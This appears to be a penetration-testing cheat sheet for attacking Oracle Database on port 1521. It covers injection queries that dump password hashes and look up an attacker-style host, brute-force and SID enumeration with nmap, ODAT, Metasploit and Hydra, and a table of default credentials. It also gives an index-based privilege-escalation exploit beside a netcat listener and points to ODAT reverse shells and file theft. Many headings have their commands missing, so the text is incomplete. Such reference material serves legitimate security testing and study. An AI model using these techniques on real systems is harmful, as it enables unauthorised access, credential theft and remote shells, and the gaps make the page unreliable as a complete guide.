1521 - Oracle DB
Oracle Database is a multi-model database management system produced and marketed by Oracle Corporation.
Port: 1521
Commands
Check privileges:
select * from user_role_privs;
Type
Command
Version
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance;
Comments
SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.
Current User
SELECT user FROM dual
List Users
SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv
List Password Hashes
SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g
Password Cracker
checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges
SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA Accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles
Current Database
SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL;
List Databases
SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status).
List Columns
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
List Tables
SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables;
Find Tables From Column Name
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case
Select Nth Row
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)
Select Nth Char
SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’
Bitwise AND
SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0
ASCII Value -> Char
SELECT chr(65) FROM dual; — returns A
Char -> ASCII Value
SELECT ascii(‘A’) FROM dual; — returns 65
Casting
SELECT CAST(1 AS char) FROM dual; SELECT CAST(’1′ AS int) FROM dual;
String Concatenation
SELECT ‘A’ || ‘B’ FROM dual; — returns AB
If Statement
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements
Case Statement
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2
Avoiding Quotes
SELECT chr(65) || chr(66) FROM dual; — returns AB
Time Delay
BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay
Make DNS Requests
SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;
Command Execution
Local File Access
Hostname, IP Address
SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames
Location of DB files
SELECT name FROM V$DATAFILE;
Default/System Databases
SYSTEM SYSAUX
* Requires privileged user
Version
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; SELECT version FROM v$instance;
User
SELECT user FROM dual
Users
SELECT username FROM all_users ORDER BY username; * SELECT name FROM sys.user$;
Tables
SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables;
Tables From Column Name
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
Current Database
SELECT global_name FROM global_name; SELECT name FROM V$DATABASE; SELECT instance_name FROM V$INSTANCE; SELECT SYS.DATABASE_NAME FROM DUAL;
Databases
SELECT DISTINCT owner FROM all_tables;
DBA Accounts
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';
Privileges
SELECT * FROM session_privs;(Retrieves Current Privs) * SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; * SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
Location of DB Files
SELECT name FROM V$DATAFILE;
Hostname, IP Address
SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; (Gets IP Address) SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; (Gets Hostnames)
Enumeration
oscanner
Install oscanner:
apt-get install oscanner
Run oscanner:
oscanner -s 192.168.1.200 -P 1521
tnscmd10g
Fingerprint Oracle TNS Version
Fingerprint oracle tns:
tnscmd10g version -h TARGET
Nmap
Run nmap scripts against Oracle TNS:
nmap -p 1521 -A TARGET
Find tns version:
nmap --script=oracle-tns-version
Brute force oracle user accounts
Identify default Oracle databases:
brute force users using the SID:
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <host>
or
ODAT
https://github.com/quentinhardy/odat
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
Usage examples of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA
You have a Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database
Tested on Oracle Database 10g, 11g, 12c and 18c.
Install: download the latest release from the github repo
Examples:
Identify SIDs
identify users:
use the the wordlist below for just the default accounts
find vulnarable modules:
Upload shell
Get files
Metasploit
sid bruteforce:
tns version:
sid enum:
username enumeration:
index priv esc:
execute sql queries:
enumerate the database:
Hydra
brute-force a listener password if exists:
Default accounts
Username
Password
SYSTEM
MANAGER
SYS
CHANGE_ON_INSTALL
DBSNMP
DBSNMP
SCOTT
TIGER
PCMS_SYS
PCMS_SYS
WMSYS
WMSYS
OUTLN
OUTLN
Try lowercase as well
wordlist:
Connecting to Oracle DB
To interact with Oracle from our Kali box, there are three tools that can come in handy. sqlplus is required for odat to work properly:
Sqlplus will be installed with odat. So just install odat (apt install odat)
Connect as normal user:
Connect as sysdba:
Privilege escalation
Can also do the Metasploit module
Oracle priv esc and obtain DBA access:
Run netcat: netcat -nvlp 443 code
SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs;
Remove the exploit using:
drop index exploit_1337;
ODAT
reverse shell #1
If your trying to do this with sqlplus you need to put a / at the end to complete the operation
reverse shell #1
Resources:
https://medium.com/@netscylla/oracle-hacks-part-2-b1ccb1916d1f
Last updated
Was this helpful?